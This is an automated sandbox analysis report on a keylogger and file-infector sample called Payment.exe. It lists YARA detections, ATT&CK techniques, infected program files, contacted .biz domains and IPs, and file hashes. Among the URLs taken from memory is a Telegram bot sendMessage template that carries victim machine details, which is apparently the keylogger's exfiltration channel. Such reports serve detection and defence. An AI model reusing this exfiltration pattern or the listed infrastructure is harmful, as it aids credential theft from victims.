Source: Yara match	File source: 39.2.jwBqGZseW.exe.36d0d3e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.jwBqGZseW.exe.36cfe1e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.jwBqGZseW.exe.36d0d3e.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.jwBqGZseW.exe.5d10000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Payment.exe.3c40000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.jwBqGZseW.exe.5d10000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Payment.exe.3c40f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Payment.exe.3c40f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2167539914.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Payment.exe PID: 7248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jwBqGZseW.exe PID: 6056, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 8.2.Payment.exe.3c40000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.jwBqGZseW.exe.36cfe1e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.jwBqGZseW.exe.36d0d3e.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.jwBqGZseW.exe.36cfe1e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.jwBqGZseW.exe.36d0d3e.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.jwBqGZseW.exe.5d10000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Payment.exe.3c40000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.jwBqGZseW.exe.5d10000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Payment.exe.3c40f20.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.Payment.exe.3c40f20.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2167539914.0000000004D71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2157331716.0000000005D10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000027.00000002.2134571739.000000000368F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2149738780.0000000003C40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Payment.exe PID: 7248, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: jwBqGZseW.exe PID: 6056, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	22 Native API	2 LSASS Driver	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	1 Taint Shared Content	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 DLL Side-Loading	2 LSASS Driver	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Service Execution	1 Windows Service	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	3 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	21 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 Scheduled Task/Job	1 Windows Service	4 Obfuscated Files or Information	NTDS	233 System Information Discovery	Distributed Component Object Model	Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	111 Process Injection	12 Software Packing	LSA Secrets	131 Security Software Discovery	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	1 Scheduled Task/Job	1 Timestomp	Cached Domain Credentials	1 Process Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	41 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	322 Masquerading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	41 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	111 Process Injection	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Payment.exe	42%	Virustotal		Browse
Payment.exe	47%	ReversingLabs	Win32.Spyware.Snakekeylogger
SAMPLE	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Check.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\Au3Info.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	100%	Avira	W32/Infector.Gen
C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	100%	Avira	W32/Infector.Gen

Name	IP	Active	Malicious
76899.bodis.com	199.59.243.228	true	false
parkingpage.namecheap.com	91.195.240.19	true	false
vjaxhpbji.biz	82.112.184.197	true	false
pywolwnvd.biz	52.11.240.239	true	false
ytctnunms.biz	54.85.87.184	true	false
lrxdmhrr.biz	52.11.240.239	true	false
vrrazpdh.biz	52.26.80.133	true	false
tbjrpv.biz	34.245.175.187	true	false
084725.parkingcrew.net	13.248.148.254	true	false
xlfhhhm.biz	54.169.144.97	true	true
npukfztj.biz	3.229.117.57	true	true
anpmnmxo.biz	192.64.119.165	true	false
sxmiywsfv.biz	18.142.91.111	true	false
przvgke.biz	72.52.178.23	true	false
dwrqljrr.biz	52.11.240.239	true	false
gytujflc.biz	208.117.43.225	true	false
gvijgjwkh.biz	54.85.87.184	true	false
gnqgo.biz	34.229.166.50	true	false
reallyfreegeoip.org	104.21.64.1	true	true
deoci.biz	34.229.166.50	true	false
iuzpxe.biz	18.142.91.111	true	false
checkip.dyndns.com	132.226.8.169	true	false
nqwjmb.biz	52.43.119.120	true	false
wllvnzb.biz	13.213.51.196	true	false
cvgrf.biz	52.11.240.239	true	false
lpuegx.biz	82.112.184.197	true	false
bumxkqgxu.biz	3.229.117.57	true	true
vcddkls.biz	13.213.51.196	true	false
vyome.biz	52.26.80.133	true	false
dlynankz.biz	85.214.228.140	true	false
oshhkdluh.biz	52.11.240.239	true	false
jpskm.biz	52.26.80.133	true	false
ftxlah.biz	54.169.144.97	true	true
ifsaia.biz	18.142.91.111	true	false
jhvzpcfg.biz	3.229.117.57	true	true
saytjshyf.biz	3.229.117.57	true	true
fwiwk.biz	72.52.178.23	true	false
typgfhb.biz	18.142.91.111	true	false
esuzf.biz	52.26.80.133	true	false
myups.biz	165.160.13.20	true	false
yauexmxk.biz	34.229.166.50	true	false
ssbzmoy.biz	13.213.51.196	true	false
knjghuig.biz	13.213.51.196	true	false
yunalwv.biz	208.117.43.225	true	false
brsua.biz	52.212.150.54	true	false
qaynky.biz	18.142.91.111	true	false
qpnczch.biz	52.26.80.133	true	false
acwjcqqv.biz	13.213.51.196	true	false
api.telegram.org	149.154.167.220	true	true
ww7.przvgke.biz	unknown	unknown	true
ww12.fwiwk.biz	unknown	unknown	true
checkip.dyndns.org	unknown	unknown	true
uhxqin.biz	unknown	unknown	true
zlenh.biz	unknown	unknown	true
lejtdj.biz	unknown	unknown	true
www.anpmnmxo.biz	unknown	unknown	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://qaynky.biz/dpyks	false
http://ww12.fwiwk.biz/wjuw?usid=27&utid=12022910910	false
http://gvijgjwkh.biz/polgcwglcl	false
http://acwjcqqv.biz/xqjf	false
http://esuzf.biz/arya	false
http://ytctnunms.biz/ae	false
http://vyome.biz/mxcqktbjv	false
http://vcddkls.biz/h	false
http://pywolwnvd.biz/uoiag	false
http://vrrazpdh.biz/hlrrkh	false
http://oflybfv.biz/kqufyo	true
http://oshhkdluh.biz/gyylxs	false
http://przvgke.biz/r	false
http://www.anpmnmxo.biz/ikcoxctprhexiycp	false
http://vcddkls.biz/r	false
http://ww7.fwiwk.biz/qvxayygldfupog?usid=27&utid=12022910102	false
http://brsua.biz/ayuhmcm	false
http://dlynankz.biz/kxri	false
http://przvgke.biz/kt	false
http://myups.biz/ipj	false
http://jhvzpcfg.biz/tcvwahikyjxgou	true
http://dwrqljrr.biz/pwmdxj	false
http://cvgrf.biz/tmcvwhhegsrpvx	false
http://esuzf.biz/stsqeigba	false
http://fwiwk.biz/ccoms	false
http://deoci.biz/nutsjjvailxyuusu	false
http://ssbzmoy.biz/tmp	false
http://vyome.biz/hmjljoygme	false
http://sxmiywsfv.biz/ljgqqouxy	false
http://pywolwnvd.biz/bxahccuchxrahyi	false
http://xlfhhhm.biz/wcdojufdhlu	true
http://ww7.przvgke.biz/ryyftbrdpkr?usid=27&utid=12022893059	false
http://iuzpxe.biz/rrkpugwxhmi	false
http://knjghuig.biz/qcm	false
http://iuzpxe.biz/kxovwpejbxujie	false
http://sxmiywsfv.biz/gfoywiqg	false
http://www.anpmnmxo.biz/ovyjaq	false
http://gvijgjwkh.biz/ssxh	false
http://typgfhb.biz/tknftu	false
http://cvgrf.biz/ncuqcjjolokpyly	false
http://wllvnzb.biz/ay	false
http://yauexmxk.biz/ouxosbeu	false
http://ww7.przvgke.biz/r?usid=27&utid=12022892926	false
http://yunalwv.biz/lpjrtgtrcj	false
http://knjghuig.biz/a	false
http://acwjcqqv.biz/fktafvxejauk	false
http://brsua.biz/uqgubhowqkworycc	false
http://jhvzpcfg.biz/pjrcxvgcrciphj	true
http://ww7.fwiwk.biz/ccoms?usid=27&utid=12022910001	false
http://tbjrpv.biz/idmrbxil	false
http://yunalwv.biz/buvxjx	false
http://saytjshyf.biz/paucmhg	true
http://dlynankz.biz/unklgjihfthc	false
http://ifsaia.biz/aivpwrjbclkvi	false

URLs from Memory and Binaries

Name	Source	Malicious
http://82.112.184.197/sdhhalso	Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmp	false
https://duckduckgo.com/ac/?q=	jwBqGZseW.exe, 00000027.00000002.2150258037.0000000004A49000.00000004.00000800.00020000.00000000.sdmp	false
http://34.229.166.50/	Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmp	false
http://85.214.228.140/unklgjihfthc	Payment.exe, 00000008.00000002.2178910492.0000000007066000.00000004.00000020.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2124505788.0000000001201000.00000004.00000020.00020000.00000000.sdmp	false
https://scss.adobesc.cominvalidAnnotIdList	AdobeCollabSync.exe.8.dr	false
https://scss.adobesc.comreasoncom.adobe.review.sdk	AdobeCollabSync.exe.8.dr	false
https://chrome.google.com/webstore?hl=enlBLr	jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003B62000.00000004.00000800.00020000.00000000.sdmp	false
http://brsua.biz/d	Payment.exe, 00000008.00000002.2124505788.00000000011D3000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Payment.exe, 00000000.00000002.899266087.0000000002F11000.00000004.00000800.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2150772680.0000000003CF1000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000012.00000002.1037469944.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.00000000039D1000.00000004.00000800.00020000.00000000.sdmp	false
http://18.142.91.111/	Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmp	false
http://52.11.240.239/pwmdxj	Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmp	false
http://52.43.119.120/cgdwvsj	Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmp	false
https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/RFList	AdobeCollabSync.exe.8.dr	false
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	jwBqGZseW.exe, 00000027.00000002.2150258037.0000000004A49000.00000004.00000800.00020000.00000000.sdmp	false
http://crl.ver)	svchost.exe, 0000002B.00000002.2143386918.0000019D59200000.00000004.00000020.00020000.00000000.sdmp	false
http://checkip.dyndns.org	jwBqGZseW.exe, 00000027.00000002.2138445632.00000000039D1000.00000004.00000800.00020000.00000000.sdmp	false
http://85.214.228.140/	Payment.exe, 00000008.00000002.2178910492.0000000007066000.00000004.00000020.00020000.00000000.sdmp	false
https://reallyfreegeoip.org	Payment.exe, 00000008.00000002.2150772680.0000000003D40000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003A4E000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003A94000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003A24000.00000004.00000800.00020000.00000000.sdmp	false
http://85.214.228.140/htdxfxsikhflmhhj	Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2179441071.0000000007076000.00000004.00000020.00020000.00000000.sdmp	false
https://gemini.google.com/app?q=	jwBqGZseW.exe, 00000027.00000002.2150258037.0000000004A49000.00000004.00000800.00020000.00000000.sdmp	false
http://52.26.80.133/0?	Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmp	false
http://82.112.184.197/	Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmp	false
http://gnqgo.biz/H$	Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmp	false
http://3.229.117.57/	Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmp	false
http://qpnczch.biz//	Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmp	false
https://scss.adobesc.comhttps://scss.adobesc.comhttps://scss.adobesc.com	AdobeCollabSync.exe.8.dr	false
http://52.26.80.133:80/klwkdohmlimacmer	Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmp	false
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	jwBqGZseW.exe, 00000027.00000002.2150258037.0000000004A49000.00000004.00000800.00020000.00000000.sdmp	false
https://scss.adobesc.com	AdobeCollabSync.exe.8.dr	false
http://18.142.91.111/oqljmnqcm4	Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmp	false
https://PrefSyncJob/com.adobe.acrobat.ADotCom/Resource/Sync/Pref/StateMachinehttps://PrefSyncJob/com	AdobeCollabSync.exe.8.dr	false
https://scss.adobesc.comemptyAnnotations	AdobeCollabSync.exe.8.dr	false
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:PC-MLN150%0D%0ADate%	Payment.exe, 00000008.00000002.2150772680.0000000003DBE000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp	false
https://lifecycleapp.operationlifecycle.shutdownlifecycle.startuptimer.starttimertimer.stoppedtimer.	AdobeCollabSync.exe.8.dr	false
http://52.26.80.133/	Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmp	false
https://api.telegram.org/bot/sendMessage?chat_id=&text=	Payment.exe, 00000008.00000002.2150772680.0000000003DBE000.00000004.00000800.00020000.00000000.sdmp, jwBqGZseW.exe, 00000027.00000002.2138445632.0000000003AB8000.00000004.00000800.00020000.00000000.sdmp	false
http://vyome.biz/	Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmp	false
https://g.live.com/odclientsettings/Prod/C:	svchost.exe, 0000002B.00000003.1203309926.0000019D59021000.00000004.00000800.00020000.00000000.sdmp	false
http://18.142.91.111/gfoywiqg	Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmp, Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmp	false
http://18.142.91.111/oqljmnqcm	Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmp	false
https://duckduckgo.com/chrome_newtabv20	jwBqGZseW.exe, 00000027.00000002.2150258037.0000000004A49000.00000004.00000800.00020000.00000000.sdmp	false
https://firefox.settings.services.mozilla.com/v1MaybeMigrateVersion1118.0.1.0in	default-browser-agent.exe.8.dr	false
http://208.117.43.225/lpjrtgtrcj	Payment.exe, 00000008.00000002.2178012135.0000000006FD2000.00000004.00000020.00020000.00000000.sdmp	false
http://85.214.228.140:80/unklgjihfthc	Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmp	false
http://saytjshyf.biz/	Payment.exe, 00000008.00000002.2178012135.0000000006FC2000.00000004.00000020.00020000.00000000.sdmp	false
http://52.212.150.54:80/uqgubhowqkworycc6	Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	false
54.169.144.97	xlfhhhm.biz	United States	16509	AMAZON-02US	true
104.21.64.1	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	true
52.43.119.120	nqwjmb.biz	United States	16509	AMAZON-02US	false
52.11.240.239	pywolwnvd.biz	United States	16509	AMAZON-02US	false
54.85.87.184	ytctnunms.biz	United States	14618	AMAZON-AESUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
34.245.175.187	tbjrpv.biz	United States	16509	AMAZON-02US	false
3.229.117.57	npukfztj.biz	United States	14618	AMAZON-AESUS	true
34.229.166.50	gnqgo.biz	United States	14618	AMAZON-AESUS	false
13.213.51.196	wllvnzb.biz	United States	16509	AMAZON-02US	false
52.26.80.133	vrrazpdh.biz	United States	16509	AMAZON-02US	false
13.248.148.254	084725.parkingcrew.net	United States	16509	AMAZON-02US	false
18.142.91.111	sxmiywsfv.biz	United States	16509	AMAZON-02US	false
192.64.119.165	anpmnmxo.biz	United States	22612	NAMECHEAP-NETUS	false
199.59.243.228	76899.bodis.com	United States	395082	BODIS-NJUS	false
91.195.240.19	parkingpage.namecheap.com	Germany	47846	SEDO-ASDE	false
165.160.13.20	myups.biz	United States	19574	CSCUS	false
208.117.43.225	gytujflc.biz	United States	32748	STEADFASTUS	false
72.52.178.23	przvgke.biz	United States	32244	LIQUIDWEBUS	false
85.214.228.140	dlynankz.biz	Germany	6724	STRATOSTRATOAGDE	false
52.212.150.54	brsua.biz	United States	16509	AMAZON-02US	false
82.112.184.197	vjaxhpbji.biz	Russian Federation	43267	FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRU	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1662149
Start date and time:	2025-04-10 18:08:50 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 14m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	43
Number of new started drivers analysed:	3
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Payment.exe
Detection:	MAL
Classification:	mal100.spre.troj.spyw.expl.evad.winEXE@38/170@98/24
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 91% Number of executed functions: 346 Number of non-executed functions: 47
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): SearchFilterHost.exe, dllhost.exe, DiagnosticsHub.StandardCollector.Service.exe, SearchProtocolHost.exe, SIHClient.exe, VSSVC.exe, WmiApSrv.exe, SearchIndexer.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.9.183.29, 20.12.23.50
Excluded domains from analysis (whitelisted): ww7.fwiwk.biz, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, oflybfv.biz, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net, fe3cr.delivery.mp.microsoft.com, ww12.przvgke.biz, yhqqc.biz, mnjmhp.biz, prod.fs.microsoft.com.akadns.net, c.pki.goog
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:09:42	API Interceptor	913798x Sleep call for process: Payment.exe modified
12:09:45	API Interceptor	49x Sleep call for process: powershell.exe modified
12:09:48	API Interceptor	301958x Sleep call for process: perfhost.exe modified
12:09:49	API Interceptor	7186x Sleep call for process: jwBqGZseW.exe modified
12:10:18	API Interceptor	2x Sleep call for process: svchost.exe modified
12:10:23	API Interceptor	199x Sleep call for process: msdtc.exe modified
18:09:47	Task Scheduler	Run new task: jwBqGZseW path: C:\Users\user\AppData\Roaming\jwBqGZseW.exe

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1721856
Entropy (8bit):	4.39188893373012
Encrypted:	false
SSDEEP:	24576:H1CAR0itVg9N9JMlDlfjRiVuVsWt5MJMs:VCAbgFIDRRAubt5M
MD5:	CAEA8C1E10BADBC4E0F7E710DCB16FD8
SHA1:	9D412B55BCBA1293AF57CBF3FD3D99C07D330247
SHA-256:	DFA89701A8EA978D66155F2885307802EE0E7C01191C8257C61B94C4B753D87F
SHA-512:	6DE165B6F9688F219DFB01B1E74658CAC90CB0F4BBF0870D91C216F93635654010867E5E77B4E62D0EC1DF77DA7629796044FBB57DBA7947E4A70575BEC6F26F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.~.2.-.2.-.2.-n.G-.2.-n.E-J2.-n.D-.2.-.Z.,.2.-.Z.,.2.-.Z.,.2.-.J%-.2.-.2.-.2.-.[.,.2.-.[I-.2.-.2!-.2.-.[.,.2.-Rich.2.-........................PE..L...g.(c.....................6......&........0....@..........................`'......{......................................,b..<....p...............................L..8............................L..@............0..,............................text............................... ..`.rdata...8...0...:..."..............@..@.data........p.......\..............@....rsrc........p.......f..............@...................................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\AutoIt3\Au3Info.exe

Download File

Process:	C:\Users\user\Desktop\Payment.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1663488
Entropy (8bit):	4.320202864684943
Encrypted:	false
SSDEEP:	12288:cNUqaKghyV3VfCfHcqNS0zKepmlDlpVfjp8EizX+AuV27snt5odJMs:cCZKg8Vg9N9JMlDlfjRiVuVsWt5MJMs
MD5:	18E4A1EC0763852092619F7BBED8D4BF
SHA1:	B7856FE2D413F6D870C737BD81E0549C32629B10
SHA-256:	5A86FE7665AD2A64BD44B1AB29DC74EA7618765AEE94217BC845B811A88F81E9
SHA-512:	FCCC5BA8428BB235FC1C134383F0F873A39D35688A3F2A4B24084EDE8A35D554B0089262D9D1E355C08920A788BEF72BBC3AB95C391278EDA01D427449FF003F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Reputation:	unknown
